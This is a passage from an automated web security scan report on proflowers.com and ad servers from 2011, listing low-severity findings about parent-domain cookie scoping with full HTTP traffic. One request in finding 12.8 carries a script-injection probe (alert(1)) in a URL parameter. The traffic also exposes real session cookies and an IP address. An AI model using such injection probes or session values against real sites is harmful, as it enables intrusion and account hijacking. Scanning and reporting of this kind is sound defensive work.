5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:43 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:10:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:43 GMT
Content-Length: 184823


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
12.7. http://www.proflowers.com/mothers-day-flowers-MDF  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero1&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:22 GMT
Content-Length: 238190


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
12.8. http://www.proflowers.com/send-flowers-bsl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /send-flowers-bsl?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:17:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:17:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:23 GMT
Content-Length: 251606


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
12.9. https://accounts.proflowers.com/CustomerLogin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
12.10. https://accounts.proflowers.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
12.11. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1657&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; dly2=3-lkkjy3-P~hoc~0~1uo0~1-; dmg2=2-null7566%4050%4057+53%3A01%3A72%3ANZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lkkjy3-1~70y9vrnt7vq8~146z~2ihm~0-; pct=1-oevyvt~gn7ey36j-vOrunivbe~gn7ey36i-yhpvq~gn7ey36j-; T_de95=ahc%3Aljs1%3A1; rth=2-ljzkpb-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 09 May 2011 01:01:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1046365390/?label=JkM_CPa6iwIQzon58gM&amp;guid=ON&amp;script=0
Connection: close
Set-Cookie: T_de95=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ck8y=gj9%3Ax0sd%3A1; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:00 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-gj9~x0sd~1~1-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:00 GMT; Path=/
Content-Length: 0

12.12. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&browse_products=91637&fb_key=undefined%20Fields%20of%20Europe%20for%20Spring
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; rsiPus_8M_3="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElXUq9TwKhTQq2Ubnlep6FA0C8r6htCP2PSMq515hwVRH+xujb+G1htaTXszdeYeilTKKO1RBpCQ0t0e2bIMKUlM6bClRwGcxa+rMOmPp+zucy3NXWBXF98hg0FKNucuRxIwwaBqYDZc6gnhLN9X4uRT1JhPmDtba7wb1Ny0LW1ZiGWsLWEcpgifGwVEE5eaMuOG08OuIdls6ej9CGChzNgtGsTz2fAmDRoIO7NRmVGO2Fu0NmIJaCq7dRuHscaTiC32VFYaA+rHHFt2+c5dlmsE3GVMKlrsnqqSWAF0XEbT2iXL29pLdhi4J90vyDRyP5v7MXOQ2SnexhjoTI5feC3ziZujOSKbuHw0UZzk0vKfGo2UI5kqXNXbmSsPn/zT4VYlQl3qI1tr+mET3Lk9JcNnCeolcuo4nIUc2MVAWhQju5cRXdKnK346bdbLyeu8iNlZNnzOXbRFRhJZ76I+GGWQpAXJN3wVH7fm4hpae41QS4ebXx2GAiSPiFanMRGgxk1KKyk1R9inDRhNoP+NEFnk4QCIn0xHXRkmHQxFNYR16es6aFmKW0aXwrfjh/SleuLcnNVOtmkxOqqySqyGprAvdvjNPMG6OSZC+mmHMulB/MVrHv+J4VtHZPz4w/D7w00KwgJ9/gt0igYOwCqs7sTKGjscJmbv5uKi1CLBZ30Eert2NaeyUoIBxi2ZcULwt/pNT+BN4X/jzNpqtAsS2eWt+6k+t1yjORdslvobLE5uBgu+QoIj9KoAI/xn5tbSJNbh/pqDYFgbWX6rn8LBlqlhvNirM2Iac8nZobH2ruya7LtRtlAMmYS8q2hdLyVG/f3NGmzPJFmiflLeVXcvRJm9fM+C44nvTf3dth3bO0BRTJJRm1xoSl46U/Jt/klHQfgwwR9piSC4JNxvNN8mx9N0NDk5r1u1PzRR8T7hTV3g2qe8NSmVo7wBTml4xNMgbY+g8FGDaZ4l+tgQR7HDojsJ8vv5P8akjydW4FTJxg="; rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQng1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzyurwWondhYeen7CWIWgxbqCdmY3a4wLoRcc/Reee8KNhj4BKp/euTN0DtKguTSkIDJ1vURStfWhCx5vdVhSw4H7sbZeLBt7cLZmC4R4RZG7fRG9H8EygB0KjrtgkS5/khqQTfWqMN+CQ7Re6dOsKbW6QCZw8Dy0JZ2jJgBRRN67npYQXY032n3+oCQ3q612E1CGsBQiuqZsfA5dZoy+uIW5D/D0r/XwM9wGw7l8HY0p4cwTPS7esM3w5lbCklgt/yNLi8Ih4fiXI7Kt2ZkX7dRZ8f8wICWkrpK2Tyqz9lk8gjR0ud3Njd4DLEQYQ52MTXD/E8REHhIOJSQiiGx50SD9yT9a5K72SQ9s6UpKFIYHCjsW0XJfDiR3UsJK+8WYg/VZOgiFw7QPdBC2+b/LiFDN627XlM3IUocsS1co3tAWOBD+rhB7D7TzR2PQGhc7PnHKe5+pg4ay4m/MuURvgG7SG6kmVhSHwZtzPCtXe9nVJwwwqzpGdKp/JcVvqe1cR+AO9nk+pZTXEGB2RR8cakFnhvB+5QR/xTMLSr1QnREn5KuWpPBdmk8ldJd6zXxtBO7Tkv97Z/BtuApaw7WZiT1IMop1RwvMrd+pw054zxi4C+4/HCdkcdis4luyl92Y1SpKqfV1PzoiVwa24vHOm917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyDeFhZZBL5pnaLvuwzkq+KlywCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGdsNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbt0tXHwsqBkzuZWx3y0C3if2kww3wr+Z+JovuWA6Z8M1/r9DCXyrPTIVh9T9incB64/hgqfDK0QL013XAcR2XOJyAAA5vFdniF49hWrT8fR9uOV9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar3aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjjHs7vcBGSpavo22HaEjA1ba4